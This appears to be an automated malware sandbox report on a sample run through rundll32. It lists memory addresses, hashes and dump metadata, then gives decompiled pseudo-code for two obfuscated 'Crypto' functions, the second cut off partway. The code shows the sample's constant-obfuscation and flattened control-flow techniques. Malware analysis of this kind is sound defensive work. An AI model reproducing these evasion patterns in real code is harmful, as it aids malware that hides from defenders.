                                                                                                                      0x00359e77
                                                                                                                      0x00359e7f
                                                                                                                      0x00359e87
                                                                                                                      0x00359e8f
                                                                                                                      0x00359e94
                                                                                                                      0x00359e9c
                                                                                                                      0x00359ea0
                                                                                                                      0x00359ea4
                                                                                                                      0x00359eaf
                                                                                                                      0x00359eba
                                                                                                                      0x00359ec5
                                                                                                                      0x00359ecd
                                                                                                                      0x00359ed2
                                                                                                                      0x00359ed6
                                                                                                                      0x00359ede
                                                                                                                      0x00359ee6
                                                                                                                      0x00359eee
                                                                                                                      0x00359ef6
                                                                                                                      0x00359efe
                                                                                                                      0x00359f06
                                                                                                                      0x00359f06
                                                                                                                      0x00359f06
                                                                                                                      0x00000000
                                                                                                                      0x00359f0b
                                                                                                                      0x00359f19
                                                                                                                      0x0035a08a
                                                                                                                      0x0035a08f
                                                                                                                      0x0035a092
                                                                                                                      0x0035a094
                                                                                                                      0x0035a0d4
                                                                                                                      0x0035a096
                                                                                                                      0x0035a096
                                                                                                                      0x0035a098
                                                                                                                      0x0035a098
                                                                                                                      0x0035a09c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035a09e
                                                                                                                      0x0035a09e
                                                                                                                      0x0035a0b2
                                                                                                                      0x0035a0b7
                                                                                                                      0x0035a0ba
                                                                                                                      0x0035a0bc
                                                                                                                      0x0035a0ca
                                                                                                                      0x0035a0cb
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035a0e4
                                                                                                                      0x0035a0e4
                                                                                                                      0x00000000
                                                                                                                      0x0035a0be
                                                                                                                      0x0035a0be
                                                                                                                      0x0035a0c0
                                                                                                                      0x0035a0c2
                                                                                                                      0x0035a0dd
                                                                                                                      0x0035a0c4
                                                                                                                      0x0035a0c4
                                                                                                                      0x0035a098
                                                                                                                      0x0035a09c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035a09c
                                                                                                                      0x00000000
                                                                                                                      0x0035a0c2
                                                                                                                      0x0035a098
                                                                                                                      0x0035a0e8
                                                                                                                      0x0035a0e8
                                                                                                                      0x0035a0ea
                                                                                                                      0x0035a10c
                                                                                                                      0x0035a111
                                                                                                                      0x00000000
                                                                                                                      0x0035a0ec
                                                                                                                      0x0035a0f0
                                                                                                                      0x0035a0fc
                                                                                                                      0x0035a102
                                                                                                                      0x00000000
                                                                                                                      0x0035a102
                                                                                                                      0x00000000
                                                                                                                      0x00359f1f
                                                                                                                      0x00359f25
                                                                                                                      0x0035a01e
                                                                                                                      0x0035a022
                                                                                                                      0x0035a040
                                                                                                                      0x0035a045
                                                                                                                      0x0035a047
                                                                                                                      0x0035a04c
                                                                                                                      0x0035a051
                                                                                                                      0x00359f06
                                                                                                                      0x00359f06
                                                                                                                      0x00359f06
                                                                                                                      0x00000000
                                                                                                                      0x00359f06
                                                                                                                      0x00359f2b
                                                                                                                      0x00359f31
                                                                                                                      0x0035a13f
                                                                                                                      0x00359f37
                                                                                                                      0x00359f3d
                                                                                                                      0x00359ffc
                                                                                                                      0x0035a001
                                                                                                                      0x0035a004
                                                                                                                      0x00359f06
                                                                                                                      0x00359f06
                                                                                                                      0x00359f06
                                                                                                                      0x00000000
                                                                                                                      0x00359f06
                                                                                                                      0x00359f43
                                                                                                                      0x00359f49
                                                                                                                      0x00359fb3
                                                                                                                      0x00359fc0
                                                                                                                      0x00359fc1
                                                                                                                      0x00359fc4
                                                                                                                      0x00359fd1
                                                                                                                      0x00359fd3
                                                                                                                      0x00359fd9
                                                                                                                      0x00359fe0
                                                                                                                      0x00000000
                                                                                                                      0x00359f4b
                                                                                                                      0x00359f51
                                                                                                                      0x0035a11d
                                                                                                                      0x0035a11d
                                                                                                                      0x0035a123
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035a129
                                                                                                                      0x00359f57
                                                                                                                      0x00359f8f
                                                                                                                      0x00359f94
                                                                                                                      0x00359f96
                                                                                                                      0x00359f9c
                                                                                                                      0x00359fa2
                                                                                                                      0x00359f06
                                                                                                                      0x00359f06
                                                                                                                      0x00359f06
                                                                                                                      0x00000000
                                                                                                                      0x00359f06
                                                                                                                      0x00359f06
                                                                                                                      0x00359f9c
                                                                                                                      0x00359f51
                                                                                                                      0x00359f49
                                                                                                                      0x00359f3d
                                                                                                                      0x00359f31
                                                                                                                      0x00359f25
                                                                                                                      0x0035a14a
                                                                                                                      0x0035a153
                                                                                                                      0x00000000
                                                                                                                      0x0035a153
                                                                                                                      0x0035a118
                                                                                                                      0x00000000
                                                                                                                      0x0035a118

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: M'5w$O=9$Oi$Tzlo$Tzlo$e6$pv$A$r!
                                                                                                                      • API String ID: 0-534902951
                                                                                                                      • Opcode ID: 16057298455d2b9f084242d76ea323dff45dd54a238cc26da077c3749b71e8e3
                                                                                                                      • Instruction ID: a58343939b0e200bc718691faafb6ffccaac60b011a090e61e9199a4835bfdcb
                                                                                                                      • Opcode Fuzzy Hash: 16057298455d2b9f084242d76ea323dff45dd54a238cc26da077c3749b71e8e3
                                                                                                                      • Instruction Fuzzy Hash: 471230715087809FD3A9CF25C58AA5BBBE1FBC4358F108A1DF6DA86260D7B48949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 003574DD Relevance: 11.6, Strings: 9, Instructions: 335COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E003574DD() {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				unsigned int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				void* _t373;
				signed int* _t377;
				signed int _t381;
				signed int _t383;
				signed int* _t384;
				void* _t385;
				intOrPtr _t396;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				void* _t409;
				signed int* _t410;
				signed int* _t444;
				void* _t452;
				signed int* _t456;

				_t456 =  &_v152;
				_v8 = 0x511491;
				_t396 = 0;
				_t452 = 0x68b0bf3;
				_v4 = 0;
				_v108 = 0xf5425d;
				_t398 = 0x24;
				_v108 = _v108 / _t398;
				_v108 = _v108 | 0xbb3a7fab;
				_v108 = _v108 ^ 0xbb3effbb;
				_v132 = 0xf54152;
				_v132 = _v132 + 0x73b9;
				_v132 = _v132 | 0x673a86bd;
				_v132 = _v132 >> 4;
				_v132 = _v132 ^ 0x067ffb7b;
				_v36 = 0x17d741;
				_v36 = _v36 << 0xe;
				_v36 = _v36 ^ 0xf5d04000;
				_v72 = 0xb99ed8;
				_t399 = 0x74;
				_v72 = _v72 * 0x57;
				_v72 = _v72 ^ 0x28cb8c28;
				_v72 = _v72 ^ 0x17df7740;
				_v100 = 0xb82182;
				_v100 = _v100 >> 2;
				_v100 = _v100 | 0xc07135d2;
				_v100 = _v100 ^ 0xc07f3df2;
				_v120 = 0x71fefc;
				_v120 = _v120 ^ 0x3c3b57cf;
				_v120 = _v120 ^ 0xde073c70;
				_v120 = _v120 + 0xffffefcb;
				_v120 = _v120 ^ 0xe24618f4;
				_v128 = 0x9b3c32;
				_v128 = _v128 >> 0xb;
				_v128 = _v128 ^ 0x48395a77;
				_v128 = _v128 >> 0xf;
				_v128 = _v128 ^ 0x000e9da5;
				_v136 = 0x52cc3f;
				_v136 = _v136 * 0x6b;
				_v136 = _v136 ^ 0x9c4f2321;
				_v136 = _v136 | 0xfd912896;
				_v136 = _v136 ^ 0xffd2684a;
				_v48 = 0x5298d7;
				_v48 = _v48 ^ 0x46ea6646;
				_v48 = _v48 ^ 0x46b0922b;
				_v112 = 0xeb4fde;
				_v112 = _v112 / _t399;
				_v112 = _v112 >> 0xc;
				_t400 = 0x56;
				_v112 = _v112 / _t400;
				_v112 = _v112 ^ 0x0003a7ac;
				_v52 = 0x2cac0;
				_v52 = _v52 + 0x2e2d;
				_v52 = _v52 ^ 0x00080243;
				_v124 = 0x3dbea4;
				_v124 = _v124 + 0x560a;
				_v124 = _v124 >> 0x10;
				_v124 = _v124 >> 9;
				_v124 = _v124 ^ 0x00027af4;
				_v56 = 0x4e9164;
				_v56 = _v56 >> 0xd;
				_v56 = _v56 ^ 0x00077014;
				_v28 = 0x1ac9f;
				_v28 = _v28 << 7;
				_v28 = _v28 ^ 0x00d40977;
				_v148 = 0xc87974;
				_t401 = 0xf;
				_v148 = _v148 / _t401;
				_v148 = _v148 + 0x3bc4;
				_v148 = _v148 >> 2;
				_v148 = _v148 ^ 0x0004ff8e;
				_v140 = 0x51bf99;
				_v140 = _v140 + 0x1f0d;
				_v140 = _v140 | 0x6ce4c515;
				_v140 = _v140 << 7;
				_v140 = _v140 ^ 0x7aef3c21;
				_v64 = 0x9041a6;
				_v64 = _v64 | 0xf9fd38a0;
				_v64 = _v64 + 0x56fc;
				_v64 = _v64 ^ 0xf9f31663;
				_v96 = 0xb1a19;
				_v96 = _v96 + 0x5234;
				_t402 = 0x68;
				_v96 = _v96 * 0x32;
				_v96 = _v96 ^ 0x0237c494;
				_v152 = 0x354a37;
				_v152 = _v152 | 0x37184972;
				_v152 = _v152 ^ 0x144b30cb;
				_v152 = _v152 * 0x1f;
				_v152 = _v152 ^ 0x4b54d1c6;
				_v116 = 0xf3726e;
				_v116 = _v116 + 0xcc69;
				_v116 = _v116 >> 3;
				_v116 = _v116 + 0x674b;
				_v116 = _v116 ^ 0x001624aa;
				_v44 = 0x3b88ac;
				_v44 = _v44 / _t402;
				_v44 = _v44 ^ 0x00096110;
				_v20 = 0x83fd7f;
				_v20 = _v20 ^ 0x5c57be60;
				_v20 = _v20 ^ 0x5cd84720;
				_v144 = 0x80ab55;
				_t403 = 0x46;
				_v144 = _v144 / _t403;
				_v144 = _v144 + 0xffffcaef;
				_v144 = _v144 + 0xffff67c3;
				_v144 = _v144 ^ 0x00052ea0;
				_v16 = 0xeb356a;
				_t199 =  &_v16; // 0xeb356a
				_t404 = 0x65;
				_v16 =  *_t199 / _t404;
				_v16 = _v16 ^ 0x000ce393;
				_v88 = 0xe75d2;
				_v88 = _v88 + 0xe1a2;
				_v88 = _v88 ^ 0xbfa107b7;
				_v88 = _v88 ^ 0xbfa92cf6;
				_v40 = 0xb57020;
				_t405 = 0x18;
				_v40 = _v40 / _t405;
				_v40 = _v40 ^ 0x000d9612;
				_v80 = 0xaa39d6;
				_t406 = 0x4c;
				_v80 = _v80 / _t406;
				_t407 = 0x4f;
				_v80 = _v80 / _t407;
				_v80 = _v80 ^ 0x000dd886;
				_v84 = 0x7565b2;
				_v84 = _v84 ^ 0x85e60cd2;
				_v84 = _v84 | 0xe2f126fa;
				_v84 = _v84 ^ 0xe7fbef1f;
				_v92 = 0x20921c;
				_v92 = _v92 << 0xf;
				_t408 = 0x3d;
				_v92 = _v92 / _t408;
				_v92 = _v92 ^ 0x0137fd8d;
				_v104 = 0x7d1988;
				_v104 = _v104 | 0x48f8c783;
				_v104 = _v104 * 0x2a;
				_v104 = _v104 >> 4;
				_v104 = _v104 ^ 0x0f9ace16;
				_v32 = 0xc6b5a4;
				_v32 = _v32 ^ 0x611852a0;
				_v32 = _v32 ^ 0x61d9018e;
				_v24 = 0x4e0063;
				_v24 = _v24 * 0x56;
				_v24 = _v24 ^ 0x1a371aa3;
				_v60 = 0xb39a6a;
				_v60 = _v60 + 0x379a;
				_v60 = _v60 << 0xb;
				_v60 = _v60 ^ 0x9e9cdd6f;
				_v68 = 0xe7ba26;
				_v68 = _v68 + 0xffffbb05;
				_v68 = _v68 ^ 0xbd703087;
				_v68 = _v68 ^ 0xbd98ca1c;
				_v76 = 0x8102f3;
				_v76 = _v76 << 6;
				_v76 = _v76 * 0x7c;
				_v76 = _v76 ^ 0x9f574684;
				while(1) {
					L1:
					_t444 =  *0x365c90; // 0x0
					_t373 = 0x882fd94;
					do {
						if(_t452 == 0x68b0bf3) {
							_push(_t408);
							_push(_t408);
							_t409 = 0x28;
							_t377 = E00353512(_t409);
							 *0x365c90 = _t377;
							_t377[3] = 0x4000;
							_t410 =  *0x365c90; // 0x0
							_t381 = E00353512(_t410[3]);
							_t444 =  *0x365c90; // 0x0
							_t452 = 0xf7a4d1a;
							_t408 = _t381;
							_t383 = _t444[3] + _t408;
							__eflags = _t383;
							_t444[2] = _t408;
							_t444[1] = _t408;
							 *_t444 = _t408;
							_t444[5] = _t383;
							L12:
							_t373 = 0x882fd94;
							goto L13;
						}
						if(_t452 == _t373) {
							_t384 =  *0x365c90; // 0x0
							_t408 = _v20;
							_t385 = E0034C795(_t408, _v144, _v36, _t384[3], _t384[2], _v12, _v16, _v88);
							_t456 =  &(_t456[6]);
							__eflags = _t385 - _v72;
							if(__eflags != 0) {
								_t452 = 0xcb14d1c;
							} else {
								_t452 = 0xd2040d1;
								_t396 = 1;
							}
							goto L1;
						}
						if(_t452 == 0xcb14d1c) {
							E003468DE(_v84, _v92, _v104, _v32, _t444[2]);
							E003468DE(_v24, _v60, _v68, _v76,  *0x365c90);
							L17:
							return _t396;
						}
						if(_t452 == 0xd2040d1) {
							E00347027(_v40, _v100, _v12, _v80);
							goto L17;
						}
						_t463 = _t452 - 0xf7a4d1a;
						if(_t452 != 0xf7a4d1a) {
							goto L13;
						}
						_push(_v148);
						_push(_v28);
						_push(0x341324);
						E00350EDA(0, _v108, _v140, E0034AB66(_v124, _v56, _t463),  &_v12, _v64, _v96);
						_t408 = _v152;
						_t452 =  ==  ? 0x882fd94 : 0xcb14d1c;
						E0034AE03(_t408, _v116, _v44, _t390);
						_t444 =  *0x365c90; // 0x0
						_t456 =  &(_t456[0xa]);
						goto L12;
						L13:
					} while (_t452 != 0xd072e76);
					goto L17;
				}
			}
































































                                                                                                                      0x003574dd
                                                                                                                      0x003574e3
                                                                                                                      0x003574f4
                                                                                                                      0x003574f6
                                                                                                                      0x003574fb
                                                                                                                      0x00357502
                                                                                                                      0x00357518
                                                                                                                      0x0035751d
                                                                                                                      0x00357523
                                                                                                                      0x0035752b
                                                                                                                      0x00357533
                                                                                                                      0x0035753b
                                                                                                                      0x00357543
                                                                                                                      0x0035754b
                                                                                                                      0x00357550
                                                                                                                      0x00357558
                                                                                                                      0x00357563
                                                                                                                      0x0035756b
                                                                                                                      0x00357576
                                                                                                                      0x00357583
                                                                                                                      0x00357586
                                                                                                                      0x0035758a
                                                                                                                      0x00357592
                                                                                                                      0x0035759a
                                                                                                                      0x003575a2
                                                                                                                      0x003575a7
                                                                                                                      0x003575af
                                                                                                                      0x003575b7
                                                                                                                      0x003575bf
                                                                                                                      0x003575c7
                                                                                                                      0x003575cf
                                                                                                                      0x003575d7
                                                                                                                      0x003575df
                                                                                                                      0x003575e7
                                                                                                                      0x003575ec
                                                                                                                      0x003575f4
                                                                                                                      0x003575f9
                                                                                                                      0x00357601
                                                                                                                      0x0035760e
                                                                                                                      0x00357612
                                                                                                                      0x0035761a
                                                                                                                      0x00357622
                                                                                                                      0x0035762a
                                                                                                                      0x00357632
                                                                                                                      0x0035763a
                                                                                                                      0x00357642
                                                                                                                      0x00357652
                                                                                                                      0x00357656
                                                                                                                      0x0035765f
                                                                                                                      0x00357662
                                                                                                                      0x00357666
                                                                                                                      0x0035766e
                                                                                                                      0x00357676
                                                                                                                      0x0035767e
                                                                                                                      0x00357686
                                                                                                                      0x0035768e
                                                                                                                      0x00357696
                                                                                                                      0x0035769b
                                                                                                                      0x003576a0
                                                                                                                      0x003576a8
                                                                                                                      0x003576b0
                                                                                                                      0x003576b5
                                                                                                                      0x003576bd
                                                                                                                      0x003576ca
                                                                                                                      0x003576d2
                                                                                                                      0x003576dd
                                                                                                                      0x003576eb
                                                                                                                      0x003576f0
                                                                                                                      0x003576f6
                                                                                                                      0x003576fe
                                                                                                                      0x00357703
                                                                                                                      0x0035770b
                                                                                                                      0x00357713
                                                                                                                      0x0035771b
                                                                                                                      0x00357723
                                                                                                                      0x00357728
                                                                                                                      0x00357730
                                                                                                                      0x00357738
                                                                                                                      0x00357740
                                                                                                                      0x00357748
                                                                                                                      0x00357750
                                                                                                                      0x00357758
                                                                                                                      0x00357765
                                                                                                                      0x00357768
                                                                                                                      0x0035776c
                                                                                                                      0x00357774
                                                                                                                      0x0035777c
                                                                                                                      0x00357784
                                                                                                                      0x00357791
                                                                                                                      0x00357795
                                                                                                                      0x0035779d
                                                                                                                      0x003577a5
                                                                                                                      0x003577ad
                                                                                                                      0x003577b2
                                                                                                                      0x003577ba
                                                                                                                      0x003577c2
                                                                                                                      0x003577d8
                                                                                                                      0x003577df
                                                                                                                      0x003577ea
                                                                                                                      0x003577f5
                                                                                                                      0x00357800
                                                                                                                      0x0035780b
                                                                                                                      0x00357817
                                                                                                                      0x0035781c
                                                                                                                      0x00357822
                                                                                                                      0x0035782a
                                                                                                                      0x00357832
                                                                                                                      0x0035783a
                                                                                                                      0x00357845
                                                                                                                      0x0035784c
                                                                                                                      0x00357851
                                                                                                                      0x0035785a
                                                                                                                      0x00357865
                                                                                                                      0x0035786d
                                                                                                                      0x00357875
                                                                                                                      0x0035787d
                                                                                                                      0x00357885
                                                                                                                      0x00357897
                                                                                                                      0x0035789a
                                                                                                                      0x003578a1
                                                                                                                      0x003578ac
                                                                                                                      0x003578c1
                                                                                                                      0x003578c6
                                                                                                                      0x003578d0
                                                                                                                      0x003578d5
                                                                                                                      0x003578db
                                                                                                                      0x003578e3
                                                                                                                      0x003578eb
                                                                                                                      0x003578f3
                                                                                                                      0x003578fb
                                                                                                                      0x00357903
                                                                                                                      0x0035790b
                                                                                                                      0x00357914
                                                                                                                      0x00357917
                                                                                                                      0x0035791b
                                                                                                                      0x00357923
                                                                                                                      0x0035792b
                                                                                                                      0x00357938
                                                                                                                      0x0035793c
                                                                                                                      0x00357941
                                                                                                                      0x00357949
                                                                                                                      0x00357954
                                                                                                                      0x0035795f
                                                                                                                      0x0035796a
                                                                                                                      0x0035797d
                                                                                                                      0x00357984
                                                                                                                      0x0035798f
                                                                                                                      0x00357997
                                                                                                                      0x0035799f
                                                                                                                      0x003579a4
                                                                                                                      0x003579ac
                                                                                                                      0x003579b4
                                                                                                                      0x003579bc
                                                                                                                      0x003579c4
                                                                                                                      0x003579cc
                                                                                                                      0x003579d4
                                                                                                                      0x003579de
                                                                                                                      0x003579e2
                                                                                                                      0x003579ea
                                                                                                                      0x003579ea
                                                                                                                      0x003579ea
                                                                                                                      0x003579f0
                                                                                                                      0x003579f5
                                                                                                                      0x003579fb
                                                                                                                      0x00357afa
                                                                                                                      0x00357afb
                                                                                                                      0x00357afe
                                                                                                                      0x00357aff
                                                                                                                      0x00357b04
                                                                                                                      0x00357b09
                                                                                                                      0x00357b1f
                                                                                                                      0x00357b28
                                                                                                                      0x00357b2d
                                                                                                                      0x00357b33
                                                                                                                      0x00357b3a
                                                                                                                      0x00357b3f
                                                                                                                      0x00357b3f
                                                                                                                      0x00357b41
                                                                                                                      0x00357b44
                                                                                                                      0x00357b47
                                                                                                                      0x00357b49
                                                                                                                      0x00357b4c
                                                                                                                      0x00357b4c
                                                                                                                      0x00000000
                                                                                                                      0x00357b4c
                                                                                                                      0x00357a03
                                                                                                                      0x00357aa8
                                                                                                                      0x00357ac5
                                                                                                                      0x00357acc
                                                                                                                      0x00357ad1
                                                                                                                      0x00357ad4
                                                                                                                      0x00357ad8
                                                                                                                      0x00357ae7
                                                                                                                      0x00357ada
                                                                                                                      0x00357adc
                                                                                                                      0x00357ae1
                                                                                                                      0x00357ae1
                                                                                                                      0x00000000
                                                                                                                      0x00357ad8
                                                                                                                      0x00357a0b
                                                                                                                      0x00357b94
                                                                                                                      0x00357bb5
                                                                                                                      0x00357bc0
                                                                                                                      0x00357bc9
                                                                                                                      0x00357bc9
                                                                                                                      0x00357a17
                                                                                                                      0x00357b75
                                                                                                                      0x00000000
                                                                                                                      0x00357b7b
                                                                                                                      0x00357a1d
                                                                                                                      0x00357a23
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00357a29
                                                                                                                      0x00357a2d
                                                                                                                      0x00357a3c
                                                                                                                      0x00357a63
                                                                                                                      0x00357a83
                                                                                                                      0x00357a87
                                                                                                                      0x00357a8a
                                                                                                                      0x00357a8f
                                                                                                                      0x00357a95
                                                                                                                      0x00000000
                                                                                                                      0x00357b51
                                                                                                                      0x00357b51
                                                                                                                      0x00000000
                                                                                                                      0x00357b5d

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: V$!<z$-.$4R$FfF$Kg$c$j5$wZ9H
                                                                                                                      • API String ID: 0-3223435920
                                                                                                                      • Opcode ID: 256ad68d022f922edb0e346c70836e7fa0ac50b1ebd2725aaaf414a8ada4684b
                                                                                                                      • Instruction ID: 04e838dcc1847c5b2267ffcfe16646a15d6def0b7387cb14e0dfe67a53658272
                                                                                                                      • Opcode Fuzzy Hash: 256ad68d022f922edb0e346c70836e7fa0ac50b1ebd2725aaaf414a8ada4684b
                                                                                                                      • Instruction Fuzzy Hash: 8C0221715083808FD3A9CF25D48AA4BFBF2FBC5718F50891DF6998A261D7B58948CF02
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0035ACD3 Relevance: 11.6, Strings: 9, Instructions: 313COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0035ACD3(intOrPtr* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr* _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _t358;
				void* _t359;
				intOrPtr _t360;
				void* _t366;
				void* _t375;
				signed int _t378;
				signed int _t379;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				intOrPtr* _t426;
				intOrPtr _t430;
				signed int* _t431;

				_t431 =  &_v160;
				_t426 = __ecx;
				_v12 = __ecx;
				_v8 = 0x8c571a;
				_t430 = 0;
				_t375 = 0x79707ab;
				_v4 = 0;
				_v64 = 0xfc5ff;
				_v64 = _v64 >> 6;
				_v64 = _v64 ^ 0x00003f17;
				_v140 = 0x873397;
				_v140 = _v140 * 0x50;
				_v140 = _v140 << 5;
				_v140 = _v140 << 4;
				_v140 = _v140 ^ 0x803e6000;
				_v112 = 0x5cc448;
				_v112 = _v112 | 0xb5fdf5b7;
				_v112 = _v112 >> 9;
				_v112 = _v112 ^ 0x005afefa;
				_v60 = 0x19d054;
				_t378 = 0x29;
				_v60 = _v60 / _t378;
				_v60 = _v60 ^ 0x0000a12d;
				_v40 = 0x4c7c9b;
				_t379 = 0x7b;
				_v40 = _v40 / _t379;
				_v40 = _v40 ^ 0x00009f31;
				_v88 = 0xb88e01;
				_v88 = _v88 << 8;
				_v88 = _v88 | 0xb280bd16;
				_v88 = _v88 ^ 0xba886110;
				_v80 = 0xf71efc;
				_v80 = _v80 << 9;
				_t380 = 0x34;
				_v80 = _v80 / _t380;
				_v80 = _v80 ^ 0x04950844;
				_v96 = 0xf5fda;
				_v96 = _v96 >> 7;
				_t381 = 0x11;
				_v96 = _v96 * 0x46;
				_v96 = _v96 ^ 0x00041aa2;
				_v156 = 0x96c5de;
				_v156 = _v156 / _t381;
				_v156 = _v156 ^ 0x88ccdc31;
				_v156 = _v156 * 0x3d;
				_v156 = _v156 ^ 0x96be8a04;
				_v72 = 0x71396c;
				_v72 = _v72 << 0xa;
				_v72 = _v72 ^ 0x367e7763;
				_v72 = _v72 ^ 0xf298a4dc;
				_v148 = 0xd59d39;
				_v148 = _v148 >> 6;
				_v148 = _v148 + 0xffff0863;
				_v148 = _v148 << 4;
				_v148 = _v148 ^ 0x0020b4d1;
				_v116 = 0x4e2a72;
				_v116 = _v116 ^ 0x41f61916;
				_t382 = 0x66;
				_v116 = _v116 / _t382;
				_v116 = _v116 ^ 0xb72c0337;
				_v116 = _v116 ^ 0xb7828c59;
				_v28 = 0x7f34ff;
				_v28 = _v28 << 9;
				_v28 = _v28 ^ 0xfe6bca43;
				_v124 = 0x9f58a2;
				_v124 = _v124 + 0xffff9c37;
				_v124 = _v124 + 0x725a;
				_v124 = _v124 << 7;
				_v124 = _v124 ^ 0x4fb1837f;
				_v52 = 0xa9f0c8;
				_v52 = _v52 + 0xfffffc3c;
				_v52 = _v52 ^ 0x00ad5534;
				_v24 = 0xa43c6e;
				_t383 = 0x6e;
				_v24 = _v24 * 0x5b;
				_v24 = _v24 ^ 0x3a644c1a;
				_v132 = 0x7fb628;
				_v132 = _v132 * 0xb;
				_v132 = _v132 << 6;
				_v132 = _v132 << 0xd;
				_v132 = _v132 ^ 0x9dcf3d61;
				_v100 = 0x597f63;
				_v100 = _v100 | 0xd4d51309;
				_v100 = _v100 << 9;
				_v100 = _v100 ^ 0xbafad16c;
				_v108 = 0x4d061a;
				_v108 = _v108 >> 2;
				_v108 = _v108 ^ 0xd197d397;
				_v108 = _v108 + 0xffff042d;
				_v108 = _v108 ^ 0xd1833bae;
				_v20 = 0x2586e5;
				_v20 = _v20 + 0x8581;
				_v20 = _v20 ^ 0x0026b83c;
				_v92 = 0x3ae4f5;
				_v92 = _v92 << 1;
				_v92 = _v92 << 0xb;
				_v92 = _v92 ^ 0xae4bd9c6;
				_v44 = 0xe6dc30;
				_v44 = _v44 ^ 0xd3982ed3;
				_v44 = _v44 ^ 0xd37e8c85;
				_v144 = 0xe42628;
				_v144 = _v144 | 0xc37700ac;
				_v144 = _v144 >> 0xa;
				_v144 = _v144 << 0xc;
				_v144 = _v144 ^ 0x0fd23fe2;
				_v152 = 0x41402a;
				_t186 =  &_v152; // 0x41402a
				_t384 = 0x19;
				_v152 =  *_t186 / _t383;
				_v152 = _v152 * 0x6a;
				_v152 = _v152 ^ 0x2485591b;
				_v152 = _v152 ^ 0x24bff8d4;
				_v160 = 0xbf0758;
				_v160 = _v160 + 0x522b;
				_v160 = _v160 >> 0xe;
				_v160 = _v160 + 0xffff65d4;
				_v160 = _v160 ^ 0xfff1feea;
				_v84 = 0x1a9ecc;
				_v84 = _v84 << 0x10;
				_t385 = 0x2d;
				_v84 = _v84 / _t384;
				_v84 = _v84 ^ 0x065118ef;
				_v120 = 0x6a6625;
				_t219 =  &_v120; // 0x6a6625
				_v120 =  *_t219 / _t385;
				_v120 = _v120 >> 0xd;
				_v120 = _v120 + 0x1650;
				_v120 = _v120 ^ 0x00013394;
				_v76 = 0x6cd503;
				_v76 = _v76 + 0xffff64c6;
				_v76 = _v76 * 0x17;
				_v76 = _v76 ^ 0x09bb62c3;
				_v128 = 0x4363ee;
				_v128 = _v128 | 0x70162fad;
				_v128 = _v128 * 0x15;
				_v128 = _v128 + 0xffff87d6;
				_v128 = _v128 ^ 0x372e6b7a;
				_v36 = 0xd9ddf9;
				_v36 = _v36 << 5;
				_v36 = _v36 ^ 0x1b34c995;
				_v136 = 0xc7126f;
				_v136 = _v136 << 3;
				_v136 = _v136 >> 6;
				_v136 = _v136 + 0x2e5f;
				_v136 = _v136 ^ 0x001d82e9;
				_v104 = 0x7714f2;
				_v104 = _v104 << 2;
				_v104 = _v104 * 5;
				_t358 = 0x5786d8d;
				_v104 = _v104 | 0x0a59959c;
				_v104 = _v104 ^ 0x0b5ace50;
				_v68 = 0x585054;
				_v68 = _v68 ^ 0x33c1c88e;
